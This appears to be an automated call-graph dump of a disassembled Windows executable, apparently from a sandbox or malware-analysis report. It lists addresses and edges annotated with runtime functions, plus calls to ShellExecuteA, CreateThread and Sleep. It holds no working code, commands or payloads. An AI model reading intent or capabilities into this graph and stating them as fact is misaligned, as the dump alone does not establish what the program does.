5c835f __cftof 4 API calls 13045->13046 13047 5ced9c 13046->13047 13049 5cde2c 13048->13049 13052 5cdd3a 13049->13052 13051 5cde32 13051->13041 13056 5cdd46 __cftof ___free_lconv_mon 13052->13056 13053 5cdd67 13053->13051 13054 5c835f __cftof 4 API calls 13055 5cddd9 13054->13055 13057 5cde15 13055->13057 13061 5c9e9e 13055->13061 13056->13053 13056->13054 13057->13051 13062 5c9ec1 13061->13062 13063 5c835f __cftof 4 API calls 13062->13063 13064 5c9f37 13063->13064 13066 5c6043 13065->13066 13071 5c6029 __dosmaperr __fassign 13065->13071 13067 5c604a 13066->13067 13069 5c6069 __fassign 13066->13069 13067->13071 13072 5c61c6 13067->13072 13070 5c61c6 RtlAllocateHeap 13069->13070 13069->13071 13070->13071 13071->12995 13073 5c61d4 13072->13073 13076 5c6205 13073->13076 13079 5ca7bb 13076->13079 13078 5c61e5 13078->13071 13081 5ca7f7 __dosmaperr 13079->13081 13082 5ca7c9 __cftof 13079->13082 13080 5ca7e4 RtlAllocateHeap 13080->13081 13080->13082 13081->13078 13082->13080 13082->13081 13084 5c66ec 13083->13084 13089 5c6782 __dosmaperr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13083->13089 13085 5c6706 __cftof 13084->13085 13119 5c6a27 13084->13119 13087 5c6725 GetFileInformationByHandle 13085->13087 13085->13089 13088 5c673b 13087->13088 13087->13089 13105 5c6979 13088->13105 13089->13003 13093 5c6758 13094 5c6821 SystemTimeToTzSpecificLocalTime 13093->13094 13095 5c676b 13094->13095 13096 5c6821 SystemTimeToTzSpecificLocalTime 13095->13096 13096->13089 13142 5c6bc4 13097->13142 13099 5c6635 13100 5c663a __dosmaperr 13099->13100 13101 5c6979 5 API calls 13099->13101 13100->13003 13102 5c6653 13101->13102 13103 5c6a27 RtlAllocateHeap 13102->13103 13104 5c6672 13103->13104 13104->13003 13106 5c698f _wcsrchr 13105->13106 13109 5c6747 13106->13109 13123 5cb294 13106->13123 13108 5c69d3 13108->13109 13110 5cb294 5 API calls 13108->13110 13115 5c6821 13109->13115 13111 5c69e4 13110->13111 13111->13109 13112 5cb294 5 API calls 13111->13112 13113 5c69f5 13112->13113 13113->13109 13114 5cb294 5 API calls 13113->13114 13114->13109 13116 5c6839 13115->13116 13117 5c6859 SystemTimeToTzSpecificLocalTime 13116->13117 13118 5c683f __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13116->13118 13117->13118 13118->13093 13120 5c6a40 13119->13120 13122 5c6a54 __dosmaperr 13120->13122 13134 5cae18 13120->13134 13122->13085 13125 5cb2a2 13123->13125 13127 5cb2a8 __dosmaperr ___std_exception_copy 13125->13127 13128 5cb2dd 13125->13128 13126 5cb2d8 13126->13108 13127->13108 13129 5cb307 13128->13129 13132 5cb2ed __dosmaperr ___std_exception_copy 13128->13132 13130 5c60ea __cftof 5 API calls 13129->13130 13129->13132 13133 5cb331 13130->13133 13131 5cb255 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 13131->13133 13132->13126 13133->13131 13133->13132 13135 5cae42 __cftof 13134->13135 13137 5cae5e __dosmaperr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ ___free_lconv_mon 13135->13137 13138 5ccf9f 13135->13138 13137->13122 13141 5ccfac __cftof 13138->13141 13139 5ccfd7 RtlAllocateHeap 13140 5ccfea __dosmaperr 13139->13140 13139->13141 13140->13137 13141->13139 13141->13140 13143 5c6be8 13142->13143 13144 5c6bee __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ ___std_exception_destroy 13143->13144 13146 5c68e6 13143->13146 13144->13099 13147 5c68f2 __dosmaperr 13146->13147 13152 5cb12b 13147->13152 13149 5c690a __dosmaperr 13150 5c6918 13149->13150 13151 5cb12b 2 API calls 13149->13151 13150->13144 13151->13150 13155 5caf8e 13152->13155 13154 5cb144 13154->13149 13156 5caf9e 13155->13156 13157 5cb00a 13155->13157 13156->13157 13158 5cafa5 13156->13158 13172 5d17a8 13157->13172 13163 5cafb2 ___std_exception_destroy 13158->13163 13164 5caf25 13158->13164 13161 5cafeb 13168 5cb0c5 13161->13168 13163->13154 13165 5caf40 13164->13165 13166 5caf45 __dosmaperr 13165->13166 13175 5cb067 13165->13175 13166->13161 13169 5cb0eb __cftof 13168->13169 13170 5cb0d2 13168->13170 13169->13163 13170->13169 13171 5c8354 ___std_exception_copy RtlAllocateHeap 13170->13171 13171->13169 13186 5d15d2 13172->13186 13174 5d17bf 13174->13163 13176 5cb075 13175->13176 13179 5cb0a6 13176->13179 13182 5c8354 13179->13182 13181 5cb086 13181->13166 13183 5ca7bb __cftof 13182->13183 13184 5ca7f7 __dosmaperr 13183->13184 13185 5ca7e4 RtlAllocateHeap 13183->13185 13184->13181 13185->13183 13185->13184 13187 5d1604 13186->13187 13193 5d15f0 __dosmaperr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ ___std_exception_destroy ___std_exception_copy 13186->13193 13188 5cae18 RtlAllocateHeap 13187->13188 13189 5d160c 13187->13189 13188->13189 13190 5cb067 RtlAllocateHeap 13189->13190 13189->13193 13191 5d1699 13190->13191 13192 5caf25 RtlAllocateHeap 13191->13192 13194 5d16a6 13192->13194 13193->13174 13194->13193 13195 5cb0c5 RtlAllocateHeap 13194->13195 13195->13193 13196 598250 13197 598256 13196->13197 13203 5c5f09 13197->13203 13200 598276 13202 598270 13210 5c5e52 13203->13210 13205 598263 13205->13200 13206 5c5f97 13205->13206 13207 5c5fa3 __cftof 13206->13207 13209 5c5fad __dosmaperr ___std_exception_copy 13207->13209 13222 5c5f20 13207->13222 13209->13202 13211 5c5e5e __cftof 13210->13211 13213 5c5e65 __dosmaperr ___std_exception_copy 13211->13213 13214 5ca033 13211->13214 13213->13205 13215 5ca03f __cftof 13214->13215 13218 5ca0d7 13215->13218 13217 5ca05a 13217->13213 13220 5ca0fa 13218->13220 13219 5ccf9f RtlAllocateHeap 13221 5ca140 ___free_lconv_mon 13219->13221 13220->13219 13220->13220 13220->13221 13221->13217 13223 5c5f42 13222->13223 13225 5c5f2d __dosmaperr ___std_exception_copy ___free_lconv_mon 13222->13225 13223->13225 13226 5c97a9 13223->13226 13225->13209 13227 5c97e6 13226->13227 13228 5c97c1 13226->13228 13227->13225 13228->13227 13230 5cfba9 13228->13230 13231 5cfbb5 __cftof 13230->13231 13233 5cfbbd __dosmaperr ___std_exception_copy 13231->13233 13234 5cfc9b 13231->13234 13233->13227 13235 5cfcc1 __dosmaperr ___std_exception_copy 13234->13235 13236 5cfcbd 13234->13236 13235->13233 13236->13235 13238 5cf430 13236->13238 13239 5cf47d 13238->13239 13240 5c60ea __cftof 5 API calls 13239->13240 13244 5cf48c __cftof 13240->13244 13242 5cf72c __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13242->13235 13243 5cbd9a 5 API calls __fassign 13243->13244 13244->13242 13244->13243 13244->13244 13245 5ccb99 13244->13245 13246 5ccba4 13245->13246 13247 5cad6b __cftof 4 API calls 13246->13247 13248 5ccbb4 13247->13248 13248->13244 13252 598450 13258 5985ba 13252->13258 13259 5984a8 shared_ptr 13252->13259 13255 5985f0 13291 5a79e0 13255->13291 13259->13255 13259->13258 13260 5a71e0 13259->13260 13271 595d40 13259->13271 13278 5a78a0 13259->13278 13261 5a7206 13260->13261 13262 5a720d 13261->13262 13263 5a7242 13261->13263 13264 5a7261 13261->13264 13262->13259 13265 5a7299 13263->13265 13266 5a7249 13263->13266 13269 5acbc7 RtlAllocateHeap 13264->13269 13270 5a724f __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 13264->13270 13302 592380 13265->13302 13294 5acbc7 13266->13294 13269->13270 13270->13259 13310 595a70 13271->13310 13275 595d9a 13329 594ad0 13275->13329 13277 595dbd shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13277->13259 13280 5a78be 13278->13280 13282 5a78e4 13278->13282 13279 5a8a50 RtlAllocateHeap 13281 5a79d3 13279->13281 13280->13259 13283 592380 RtlAllocateHeap 13281->13283 13284 5a7938 13282->13284 13285 5a795d 13282->13285 13289 5a7949 13282->13289 13286 5a79d8 13283->13286 13284->13281 13287 5acbc7 RtlAllocateHeap 13284->13287 13288 5acbc7 RtlAllocateHeap 13285->13288 13285->13289 13287->13289 13288->13289 13289->13279 13290 5a79b0 shared_ptr 13289->13290 13290->13259 13367 5ab9b9 13291->13367 13293 5a79ea 13293->13258 13296 5acbcc __cftof 13294->13296 13295 5c8354 ___std_exception_copy RtlAllocateHeap 13295->13296 13296->13295 13297 5acbe6 13296->13297 13298 592380 std::_Throw_future_error 13296->13298 13297->13270 13301 5acbf2 std::_Throw_future_error 13298->13301 13306 5c308c 13298->13306 13300 5923c3 13300->13270 13301->13270 13303 59238e std::_Throw_future_error 13302->13303 13304 5c308c ___std_exception_copy RtlAllocateHeap 13303->13304 13305 5923c3 13304->13305 13305->13270 13307 5c30b6 ___std_exception_destroy ___std_exception_copy 13306->13307 13308 5c3099 13306->13308 13307->13300 13308->13307 13309 5c8354 ___std_exception_copy RtlAllocateHeap 13308->13309 13309->13307 13336 5a7760 13310->13336 13312 595a9b 13313 595b10 13312->13313 13314 5a7760 RtlAllocateHeap 13313->13314 13324 595b75 13314->13324 13315 5a71e0 RtlAllocateHeap 13315->13324 13316 595d39 13318 5a79e0 RtlAllocateHeap 13316->13318 13317 595d0d __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13317->13275 13319 595d3e 13318->13319 13321 595a70 RtlAllocateHeap 13319->13321 13320 5a78a0 RtlAllocateHeap 13320->13324 13323 595d84 13321->13323 13325 595b10 RtlAllocateHeap 13323->13325 13324->13315 13324->13316 13324->13317 13324->13320 13361 595860 13324->13361 13326 595d9a 13325->13326 13327 594ad0 RtlAllocateHeap 13326->13327 13328 595dbd shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13327->13328 13328->13275 13330 594b01 13329->13330 13333 594b2b 13329->13333 13331 5a78a0 RtlAllocateHeap 13330->13331 13332 594b18 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13331->13332 13332->13277 13334 5a7760 RtlAllocateHeap 13333->13334 13335 594ba1 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13334->13335 13335->13277 13338 5a77a7 13336->13338 13340 5a777e __cftof 13336->13340 13341 5a77fb 13338->13341 13342 5a781e 13338->13342 13347 5a780c __cftof 13338->13347 13339 5a7898 13343 592380 RtlAllocateHeap 13339->13343 13340->13312 13341->13339 13345 5acbc7 RtlAllocateHeap 13341->13345 13346 5acbc7 RtlAllocateHeap 13342->13346 13342->13347 13344 5a789d 13343->13344 13345->13347 13346->13347 13348 5a7875 shared_ptr 13347->13348 13349 5a8a50 13347->13349 13348->13312 13352 5ab999 13349->13352 13355 5ab903 13352->13355 13354 5ab9aa std::_Throw_future_error 13358 5921e0 13355->13358 13357 5ab915 13357->13354 13359 5c308c ___std_exception_copy RtlAllocateHeap 13358->13359 13360 592217 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13359->13360 13360->13357 13365 595990 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13361->13365 13366 5958c9 shared_ptr 13361->13366 13362 595a5a 13364 5a79e0 RtlAllocateHeap 13362->13364 13363 5a78a0 RtlAllocateHeap 13363->13366 13364->13365 13365->13324 13366->13362 13366->13363 13366->13365 13370 5ab93d 13367->13370 13369 5ab9ca std::_Throw_future_error 13369->13293 13371 5921e0 std::invalid_argument::invalid_argument RtlAllocateHeap 13370->13371 13372 5ab94f 13371->13372 13372->13369 13373 599050 13374 5990a4 13373->13374 13375 5a78a0 RtlAllocateHeap 13374->13375 13376 5990ec 13375->13376 13377 5a71e0 RtlAllocateHeap 13376->13377 13387 599105 shared_ptr 13377->13387 13378 59926f 13380 5992ce 13378->13380 13381 5993b0 13378->13381 13379 5a71e0 RtlAllocateHeap 13379->13387 13382 5a78a0 RtlAllocateHeap 13380->13382 13383 5a79e0 RtlAllocateHeap 13381->13383 13385 599304 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13382->13385 13383->13385 13384 595d40 RtlAllocateHeap 13384->13387 13386 5a78a0 RtlAllocateHeap 13386->13387 13387->13378 13387->13379 13387->13381 13387->13384 13387->13385 13387->13386 13630 597510 13631 5a71e0 RtlAllocateHeap 13630->13631 13632 59755b 13631->13632 13633 595d40 RtlAllocateHeap 13632->13633 13634 597563 13633->13634 13668 5a7b00 13634->13668 13636 597573 13637 5a71e0 RtlAllocateHeap 13636->13637 13638 59758e 13637->13638 13639 595d40 RtlAllocateHeap 13638->13639 13640 597595 13639->13640 13641 5a78a0 RtlAllocateHeap 13640->13641 13642 5975b8 13641->13642 13672 596e30 13642->13672 13644 597625 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13645 5975c1 shared_ptr 13645->13644 13723 5968f0 13645->13723 13647 5a71e0 RtlAllocateHeap 13649 5976f5 13647->13649 13648 59769b shared_ptr 13648->13647 13667 59778f shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13648->13667 13650 595d40 RtlAllocateHeap 13649->13650 13651 5976fd 13650->13651 13652 5a71e0 RtlAllocateHeap 13651->13652 13653 597718 13652->13653 13654 595d40 RtlAllocateHeap 13653->13654 13655 597720 13654->13655 13656 5a7b00 RtlAllocateHeap 13655->13656 13657 597731 13656->13657 13658 5a7a00 RtlAllocateHeap 13657->13658 13659 597741 13658->13659 13660 5a71e0 RtlAllocateHeap 13659->13660 13661 59775c 13660->13661 13662 595d40 RtlAllocateHeap 13661->13662 13663 597763 13662->13663 13664 5a78a0 RtlAllocateHeap 13663->13664 13665 597786 13664->13665 13666 596e30 11 API calls 13665->13666 13666->13667 13669 5a7b19 13668->13669 13670 5a7b2d 13669->13670 13671 5a8720 RtlAllocateHeap 13669->13671 13670->13636 13671->13670 13673 596e74 13672->13673 13674 5a78a0 RtlAllocateHeap 13673->13674 13675 596e9a ShellExecuteA 13674->13675 13677 596eda shared_ptr 13675->13677 13676 596f80 shared_ptr 13676->13645 13677->13676 13678 5a71e0 RtlAllocateHeap 13677->13678 13679 596fe5 13678->13679 13680 5a71e0 RtlAllocateHeap 13679->13680 13681 596ff8 13680->13681 13682 5a71e0 RtlAllocateHeap 13681->13682 13683 597008 13682->13683 13684 5a71e0 RtlAllocateHeap 13683->13684 13685 59701d 13684->13685 13686 5a71e0 RtlAllocateHeap 13685->13686 13687 597032 13686->13687 13688 5a71e0 RtlAllocateHeap 13687->13688 13689 597044 13688->13689 13690 596e30 7 API calls 13689->13690 13692 59704d shared_ptr 13690->13692 13691 5970df shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13691->13645 13692->13691 13693 59710c Sleep 13692->13693 13694 5971de 13693->13694 13695 597163 13693->13695 13697 5a78a0 RtlAllocateHeap 13694->13697 13730 5ac8f6 13695->13730 13699 5971fa 13697->13699 13700 5a78a0 RtlAllocateHeap 13699->13700 13701 597213 13700->13701 13703 5a78a0 RtlAllocateHeap 13701->13703 13705 59722c CreateThread Sleep 13703->13705 13708 597259 shared_ptr 13705->13708 13796 596fb0 13705->13796 13707 5972ff shared_ptr 13707->13645 13708->13707 13741 5a7e60 13708->13741 13710 597371 13711 5a7b00 RtlAllocateHeap 13710->13711 13714 597383 shared_ptr 13711->13714 13712 5a71e0 RtlAllocateHeap 13713 5973e1 13712->13713 13715 5a71e0 RtlAllocateHeap 13713->13715 13714->13712 13722 59742f shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13714->13722 13716 5973fc 13715->13716 13717 595d40 RtlAllocateHeap 13716->13717 13718 597403 13717->13718 13719 5a78a0 RtlAllocateHeap 13718->13719 13720 597426 13719->13720 13721 596e30 7 API calls 13720->13721 13721->13722 13722->13645 13724 596930 13723->13724 13725 59694a 13724->13725 13726 596975 13724->13726 13727 5a78a0 RtlAllocateHeap 13725->13727 13728 5a78a0 RtlAllocateHeap 13726->13728 13729 59696b shared_ptr 13727->13729 13728->13729 13729->13648 13732 5ac906 13730->13732 13731 59716d 13731->13694 13734 5ace33 13731->13734 13732->13731 13750 5ac97e 13732->13750 13754 5ace06 13734->13754 13737 5ac8ac 13738 5ac8bc 13737->13738 13739 5ac960 RtlWakeAllConditionVariable 13738->13739 13740 5ac964 13738->13740 13739->13694 13740->13694 13742 5a7ec0 13741->13742 13742->13742 13784 5a6f40 13742->13784 13744 5a7ed9 13745 5a8720 RtlAllocateHeap 13744->13745 13746 5a7ef4 13744->13746 13745->13746 13747 5a8720 RtlAllocateHeap 13746->13747 13748 5a7f49 13746->13748 13749 5a7f91 13747->13749 13748->13710 13749->13710 13751 5ac98c SleepConditionVariableCS 13750->13751 13753 5ac9a5 13750->13753 13751->13753 13753->13732 13755 5ace1c 13754->13755 13756 5ace15 13754->13756 13763 5c906b 13755->13763 13760 5c8fff 13756->13760 13759 5971d4 13759->13737 13761 5c906b RtlAllocateHeap 13760->13761 13762 5c9011 13761->13762 13762->13759 13766 5c8da1 13763->13766 13765 5c909c 13765->13759 13767 5c8dad __cftof 13766->13767 13770 5c8dfc 13767->13770 13769 5c8dc8 13769->13765 13771 5c8e18 13770->13771 13772 5c8e85 __cftof ___free_lconv_mon 13770->13772 13771->13772 13775 5c8e65 ___free_lconv_mon 13771->13775 13776 5ce567 13771->13776 13772->13769 13773 5ce567 RtlAllocateHeap 13773->13772 13775->13772 13775->13773 13778 5ce574 13776->13778 13777 5ce580 __cftof __dosmaperr 13777->13775 13778->13777 13780 5d478f 13778->13780 13781 5d479c 13780->13781 13783 5d47a4 __cftof __dosmaperr ___free_lconv_mon 13780->13783 13782 5ca7bb __cftof RtlAllocateHeap 13781->13782 13782->13783 13783->13777 13785 5a6f5b 13784->13785 13793 5a7044 shared_ptr 13784->13793 13787 5a6fdb 13785->13787 13789 5a6fca 13785->13789 13790 5a6ff1 13785->13790 13785->13793 13786 5a8a50 RtlAllocateHeap 13788 5a70d6 13786->13788 13787->13786 13787->13793 13791 592380 RtlAllocateHeap 13788->13791 13789->13788 13794 5acbc7 RtlAllocateHeap 13789->13794 13790->13787 13795 5acbc7 RtlAllocateHeap 13790->13795 13792 5a70db 13791->13792 13793->13744 13794->13787 13795->13787 13797 5a71e0 RtlAllocateHeap 13796->13797 13798 596fe5 13797->13798 13799 5a71e0 RtlAllocateHeap 13798->13799 13800 596ff8 13799->13800 13801 5a71e0 RtlAllocateHeap 13800->13801 13802 597008 13801->13802 13803 5a71e0 RtlAllocateHeap 13802->13803 13804 59701d 13803->13804 13805 5a71e0 RtlAllocateHeap 13804->13805 13806 597032 13805->13806 13807 5a71e0 RtlAllocateHeap 13806->13807 13808 597044 13807->13808 13809 596e30 8 API calls 13808->13809 13811 59704d shared_ptr 13809->13811 13810 5970df shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13811->13810 13812 59710c Sleep 13811->13812 13813 5971de 13812->13813 13814 597163 13812->13814 13816 5a78a0 RtlAllocateHeap 13813->13816 13815 5ac8f6 SleepConditionVariableCS 13814->13815 13817 59716d 13815->13817 13818 5971fa 13816->13818 13817->13813 13821 5ace33 RtlAllocateHeap 13817->13821 13819 5a78a0 RtlAllocateHeap 13818->13819 13820 597213 13819->13820 13822 5a78a0 RtlAllocateHeap 13820->13822 13823 5971d4 13821->13823 13824 59722c CreateThread Sleep 13822->13824 13825 5ac8ac RtlWakeAllConditionVariable 13823->13825 13827 597259 shared_ptr 13824->13827 13842 596fb0 11 API calls 2 library calls 13824->13842 13825->13813 13826 5972ff shared_ptr 13827->13826 13828 5a7e60 RtlAllocateHeap 13827->13828 13829 597371 13828->13829 13830 5a7b00 RtlAllocateHeap 13829->13830 13831 597383 shared_ptr 13830->13831 13832 5a71e0 RtlAllocateHeap 13831->13832 13841 59742f shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13831->13841 13833 5973e1 13832->13833 13834 5a71e0 RtlAllocateHeap 13833->13834 13835 5973fc 13834->13835 13836 595d40 RtlAllocateHeap 13835->13836 13837 597403 13836->13837 13838 5a78a0 RtlAllocateHeap 13837->13838 13839 597426 13838->13839 13840 596e30 8 API calls 13839->13840 13840->13841 13843 59c110 13844 59c167 13843->13844 13849 5a85c0 13844->13849 13846 59c17c 13847 5a85c0 RtlAllocateHeap 13846->13847 13848 59c1b8 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13847->13848 13850 5a870f 13849->13850 13851 5a85e5 13849->13851 13852 5a8a50 RtlAllocateHeap 13850->13852 13855 5a862c 13851->13855 13856 5a8656 13851->13856 13853 5a8714 13852->13853 13854 592380 RtlAllocateHeap 13853->13854 13860 5a863d shared_ptr __cftof 13854->13860 13855->13853 13857 5a8637 13855->13857 13859 5acbc7 RtlAllocateHeap 13856->13859 13856->13860 13858 5acbc7 RtlAllocateHeap 13857->13858 13858->13860 13859->13860 13860->13846 13388 5a0210 13389 5a0290 shared_ptr 13388->13389 13390 5a79e0 RtlAllocateHeap 13389->13390 13391 5a0ea8 std::_Xinvalid_argument 13390->13391 13392 5a0eb7 std::_Xinvalid_argument 13391->13392 13393 5a0ecb 13392->13393 13394 5ab9b9 RtlAllocateHeap 13393->13394 13395 5a16e4 std::_Xinvalid_argument 13394->13395 13396 5a16f3 13395->13396 13861 5a1710 13862 5a17ab shared_ptr 13861->13862 13863 5a79e0 RtlAllocateHeap 13862->13863 13864 5a26b0 std::_Xinvalid_argument 13863->13864 13866 5a26ce std::_Xinvalid_argument 13864->13866 13867 5a26e2 13866->13867 13868 5ab10e 13869 5aaf95 14 API calls 13868->13869 13870 5ab136 13869->13870 13871 5aaef8 14 API calls 13870->13871 13872 5ab14f 13871->13872 13397 5c5e09 13398 5c5ca7 __cftof 2 API calls 13397->13398 13399 5c5e1a 13398->13399 13400 598600 13401 59864c 13400->13401 13402 5a71e0 RtlAllocateHeap 13401->13402 13403 59865c 13402->13403 13404 595d40 RtlAllocateHeap 13403->13404 13405 598667 13404->13405 13406 5a78a0 RtlAllocateHeap 13405->13406 13407 5986b3 13406->13407 13408 5a78a0 RtlAllocateHeap 13407->13408 13409 598705 13408->13409 13430 5a7a00 13409->13430 13411 598717 shared_ptr 13412 5987d1 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13411->13412 13413 5a71e0 RtlAllocateHeap 13411->13413 13414 59885f 13413->13414 13415 595d40 RtlAllocateHeap 13414->13415 13416 59886a 13415->13416 13417 5a78a0 RtlAllocateHeap 13416->13417 13418 5988bc 13417->13418 13419 5a7a00 RtlAllocateHeap 13418->13419 13421 5988ce shared_ptr 13419->13421 13420 59894e shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13421->13420 13422 5a71e0 RtlAllocateHeap 13421->13422 13423 5989df 13422->13423 13424 595d40 RtlAllocateHeap 13423->13424 13425 5989ea 13424->13425 13426 5a78a0 RtlAllocateHeap 13425->13426 13427 598a3c 13426->13427 13428 5a7a00 RtlAllocateHeap 13427->13428 13429 598a4e shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13428->13429 13431 5a7a28 13430->13431 13432 5a7a72 13430->13432 13431->13432 13433 5a7a31 13431->13433 13435 5a7a81 13432->13435 13443 5a8720 13432->13443 13438 5a8a60 13433->13438 13435->13411 13436 5a7a3a 13436->13411 13439 5a8a74 13438->13439 13442 5a8a85 13439->13442 13461 5a8cc0 13439->13461 13441 5a8b0b 13441->13436 13442->13436 13444 5a874b 13443->13444 13445 5a886e 13443->13445 13449 5a87bc 13444->13449 13450 5a8792 13444->13450 13446 5a8a50 RtlAllocateHeap 13445->13446 13447 5a8873 13446->13447 13448 592380 RtlAllocateHeap 13447->13448 13455 5a87a3 13448->13455 13453 5acbc7 RtlAllocateHeap 13449->13453 13449->13455 13450->13447 13451 5a879d 13450->13451 13452 5acbc7 RtlAllocateHeap 13451->13452 13452->13455 13453->13455 13454 5a8898 13456 5acbc7 RtlAllocateHeap 13454->13456 13455->13454 13457 5a882c shared_ptr 13455->13457 13458 592380 std::_Throw_future_error 13455->13458 13456->13457 13457->13435 13459 5c308c ___std_exception_copy RtlAllocateHeap 13458->13459 13460 5923c3 13459->13460 13460->13435 13462 5a8ceb 13461->13462 13463 5a8df9 13461->13463 13467 5a8d59 13462->13467 13468 5a8d32 13462->13468 13464 5a8a50 RtlAllocateHeap 13463->13464 13465 5a8dfe 13464->13465 13466 592380 RtlAllocateHeap 13465->13466 13472 5a8d43 shared_ptr 13466->13472 13471 5acbc7 RtlAllocateHeap 13467->13471 13467->13472 13468->13465 13469 5a8d3d 13468->13469 13470 5acbc7 RtlAllocateHeap 13469->13470 13470->13472 13471->13472 13472->13441 13626 598c80 13627 598cb5 13626->13627 13628 5a78a0 RtlAllocateHeap 13627->13628 13629 598ce8 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13628->13629 13873 598d00 13874 598d54 13873->13874 13875 5a78a0 RtlAllocateHeap 13874->13875 13876 598d9c 13875->13876 13877 5a71e0 RtlAllocateHeap 13876->13877 13887 598db5 shared_ptr 13877->13887 13878 598f1f 13880 5a78a0 RtlAllocateHeap 13878->13880 13879 5a71e0 RtlAllocateHeap 13879->13887 13883 598f96 shared_ptr 13880->13883 13881 595d40 RtlAllocateHeap 13881->13887 13882 599013 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13883->13882 13885 5a79e0 RtlAllocateHeap 13883->13885 13884 5a78a0 RtlAllocateHeap 13884->13887 13886 599048 13885->13886 13887->13878 13887->13879 13887->13881 13887->13883 13887->13884 13499 5a80c0 13500 5a82a7 13499->13500 13503 5a8116 13499->13503 13511 5a89c0 13500->13511 13502 5a816d shared_ptr 13504 5a82a2 13503->13504 13506 5a815c 13503->13506 13507 5a8183 13503->13507 13505 592380 RtlAllocateHeap 13504->13505 13505->13500 13506->13504 13508 5a8167 13506->13508 13507->13502 13510 5acbc7 RtlAllocateHeap 13507->13510 13509 5acbc7 RtlAllocateHeap 13508->13509 13509->13502 13510->13502 13512 5ab999 RtlAllocateHeap 13511->13512 13513 5a89ca 13512->13513 13888 5a2700 13889 5a2747 13888->13889 13890 5a71e0 RtlAllocateHeap 13889->13890 13891 5a27e4 13890->13891 13892 595d40 RtlAllocateHeap 13891->13892 13893 5a27ec 13892->13893 13894 5a78a0 RtlAllocateHeap 13893->13894 13895 5a2835 13894->13895 13896 5a71e0 RtlAllocateHeap 13895->13896 13897 5a29b6 13896->13897 13898 595d40 RtlAllocateHeap 13897->13898 13899 5a29c1 13898->13899 13900 5a7b00 RtlAllocateHeap 